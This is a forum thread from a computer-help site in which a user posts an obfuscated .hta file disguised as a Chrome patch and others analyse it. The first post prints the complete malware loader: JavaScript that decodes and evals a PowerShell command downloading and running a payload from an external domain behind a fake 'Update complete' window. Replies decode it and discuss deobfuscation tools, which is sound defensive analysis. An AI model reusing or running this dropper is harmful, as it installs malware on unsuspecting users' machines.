Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Malware analysis: chrоmе_patch_1470326241.hta


  • Please log in to reply
13 replies to this topic

#1 FungiFreak

FungiFreak

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:02:16 PM

Posted 05 August 2016 - 11:15 AM

Last night chrome caught an automated download titled: chrоmе_patch_1470326241.hta. It was flagged as suspicious by Chrome.
 
Being curious I decided to take a look at the code, but I could not decipher what the app attempts to do. A google search shows almost nothing about this file.

Any clue what this script attempts to do, or tips on how to de-obfuscate the code pasted below?


<script>
    var zmtoh = 'twrfyw w{xmmopvwejTgoc(w-j1p0z0n,l-a1z0e0c)f;brjewsjizzuehTnom(d0s,j0a)q;v qan=fnwepwb gAfcbttirvcetXvOebyjweocvtg(o\'pWosbcbrsiupkts.kSghjexlllf\'n)n;l saoxeik=qSytfrvixncgk.sfiryohmwCzhiaortCtohdeea(q9b2l)v;oay.gRhunnl(r"ePjowwaegrzSkhzehlilg d-iWpisncdiozwgSitqyiluel wHtisdedgeenw k$odt=k$vesnvvu:zteeamdpm+q[wcphzavrv]h[lbeyctxeb]v9q2f+b\'uhcgm8j9v2x4e3n8sgz';
    var ffyuwx = 'hn2wfa3rdj.qenxyep\'j;u(xNveywz-tOzbvjjefcwte hSjynsdtgesmr.yNreftv.sWweebiCkldiyetnytw)p.xDvoiwxnqlrodandvFkiwljeo(d\'chftbtupksx:m/h/bevirmfotolleepbalbolgigyecra.bnqewtm/n1g7a/q5i2g4s.cdrapto\'y,r$kdq)w;eSbtaaurctc-fPlraoiclecsysi p$ldo;q[bSxywsutzenmj.oRmeafylcexccteiyowng.aAcsrsbekmdbeljym]t:v:bLkoxaydgWrixtuhaPmahrbtkijaylnNnawmjeu(w\'mSmyysxtqecmh.cWvicne';
    var hyqogb = 'dfoawcsm.rFzohrsmlsp\'t)w;y[rsjymsottehml.gwtijnddkolwlsn.hfnorrnmnst.amfetshsyafgwerbbovxj]l:i:xsfhpoiwl(j\'rUpptddaatgek ncxoxmbprlyehtkef.f\'p,c\'xIrnyfgocrhmeahtximosng\'e,h[aWhihnhdsovwfsq.xFwooremgsu.kMwexshsnawgoeqBdosxxBauetqthojnysh]r:g:pOkKb,u a[zSrypsetyekmo.uWhiwniddokwysh.cFwoirhmmsp.rMkexsisqangsesBhotxrIycjownx]t:k:rIanhfaoerrmyamttiuounb)h;k"s,s0h';
    var fpf = ',afjaultsbec)n;tvbawrp ybp=anqeqwh qAucztpihvtekXbOubrjlencktt(n\'tSochrviqpvtpirnrgf.qFgiglgexSoyxsstnemmzOgbwjaebcotm\'o)y;fvcasrt kpo k=f ddcowciusmdepnyta.dlvoscqaitrixoens.yhtreenfs;kpp k=e auynpefsccrabplej(fpa.isfudbesyturm(q8r)r)i;qikfn e(cby.uFnidluemEsxziosjtbsz(spg)a)abm.dDfeklxertaepFiijlget(wpl)w;v f k}y zcwaqtzckhz a(kes)h k{t}u ocyleomspef(b)y;p';
    var acbgwfvez = zmtoh + ffyuwx + hyqogb + fpf;
    var dbambjaiuz = "";
    var jhxxtqutjj = 2;
    var a = 0;
    try {
        window.drpoctg();
        a = 100000;
    } catch (e) {}
    while (a < acbgwfvez.length) {
        dbambjaiuz += acbgwfvez.charAt(a);
        a += jhxxtqutjj;
    };
    klpiqlmqm = "ev".concat("al");
    window[klpiqlmqm](dbambjaiuz);
</script>!G'T+L'P-NxksL1cn[/5>8_"w-s(9fNZ^=P*87.gg$pQ^XkSR?GtjZH'>t6Af+6*Soq]y]b[n8$"WFiYx@
<T?`y*tuzg(Ga7RRZ-B#33N*)()&TMsy0Pyq^>6^>M:5oyf@*L

Edited by FungiFreak, 05 August 2016 - 03:58 PM.


BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:16 AM

Posted 05 August 2016 - 12:33 PM

I'm quite new to malware analysis, but it seems to download this file:
https://eimooleblogger.net/17/524.dat
However it is currently unavailable.

Edit: Also a search on the website returns a lot of results including VirusTotal, Hybrid-Analysis, etc. mostly for Google and Firefox patches, so the domain is indeed fishy.

https://www.google.ca/search?q="https%3A%2F%2Feimooleblogger.net%2F17%2F524.dat"&oq="https%3A%2F%2Feimooleblogger.net%2F17%2F524.dat"&aqs=chrome..69i57.647j0j4&sourceid=chrome&ie=UTF-8#q="eimooleblogger.net"

Full dump (done really quickly):
rkMu2YU.png

From what I understand, executing that .hta will launch a PowerShell process to download the payload mentionned above and execute it. To hide this, it'll display a small window saying "Update complete" with two buttons: Ok and Information" that will probably do nothing.

Edited by Aura, 05 August 2016 - 01:11 PM.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,638 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:16 PM

Posted 06 August 2016 - 03:20 AM



From what I understand, executing that .hta will launch a PowerShell process to download the payload mentionned above and execute it. To hide this, it'll display a small window saying "Update complete" with two buttons: Ok and Information" that will probably do nothing.

 

 

Correct.

 

You can use http://deobfuscatejavascript.com to help you analyze JavaScript.


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:16 AM

Posted 06 August 2016 - 10:20 AM

I tried that website and it doesn't seems to work. I click on the "Deobfuscate" button and nothing happens. Tried in Google Chrome, Internet Explorer and Microsoft Edge.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,638 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:16 PM

Posted 06 August 2016 - 11:14 AM

I did it with the sample of the OP and it works. Mind you that the sample is an HTA (HTML Application), so I extracted the JavaScript script and copied that into the form on the website.

Extracting the script is simple: just copy everything between the <script> ... </script> tags.


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:16 AM

Posted 06 August 2016 - 11:18 AM

Now it works... I tried with other JavaScript script before and it didn't work, no idea why. Maybe I'm doing something wrong.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,638 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:16 PM

Posted 06 August 2016 - 11:26 AM

No, sometimes it's not able to deobfuscate, and then nothing changes...


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:16 AM

Posted 06 August 2016 - 11:27 AM

Ah alright. I tried it with another JavaScript snippet I have and it worked. I guess it depends on the obfuscation method used.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 FungiFreak

FungiFreak
  • Topic Starter

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:02:16 PM

Posted 06 August 2016 - 01:06 PM

Thanks for the responses.

I initially came here because the online obfuscation tools did not work for me either; however omitting the <script> tags and anything not contained within, did the trick.

I was going to download the payload onto a virtual machine to investigate further, but by that time the files were non-existent, and now the site fails to resolve and returns NXdomain.

 



#10 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,638 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:16 PM

Posted 06 August 2016 - 03:26 PM

You're welcome.

 

I searched on VirusTotal, but there was no sample of the downloaded file, only an 404 html file.


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#11 lingroot

lingroot

  • Members
  • 22 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:16 AM

Posted 10 August 2016 - 11:25 PM

I'm quite new to malware analysis, but it seems to download this file:

https://eimooleblogger.net/17/524.dat
However it is currently unavailable.

Edit: Also a search on the website returns a lot of results including VirusTotal, Hybrid-Analysis, etc. mostly for Google and Firefox patches, so the domain is indeed fishy.

https://www.google.ca/search?q="https%3A%2F%2Feimooleblogger.net%2F17%2F524.dat"&oq="https%3A%2F%2Feimooleblogger.net%2F17%2F524.dat"&aqs=chrome..69i57.647j0j4&sourceid=chrome&ie=UTF-8#q="eimooleblogger.net"

Full dump (done really quickly):
rkMu2YU.png

From what I understand, executing that .hta will launch a PowerShell process to download the payload mentionned above and execute it. To hide this, it'll display a small window saying "Update complete" with two buttons: Ok and Information" that will probably do nothing.eimoolerbloegger.net from a secured systn and 

Nice decryption. If possible please report that blog



#12 lingroot

lingroot

  • Members
  • 22 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:16 AM

Posted 10 August 2016 - 11:26 PM

You're welcome.

 

I searched on VirusTotal, but there was no sample of the downloaded file, only an 404 html file.

most probably they removed it



#13 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:09:16 AM

Posted 11 August 2016 - 06:59 AM

The website seems offline, so it might have been reported already. Also, it seems that this .hta could be related to this .js.

http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware

Notice the payload path and name on the website.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#14 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,638 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:16 PM

Posted 11 August 2016 - 12:54 PM

 

You're welcome.

 

I searched on VirusTotal, but there was no sample of the downloaded file, only an 404 html file.

most probably they removed it

 

 

No, it's unlikely that VirusTotal would remove the sample.


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users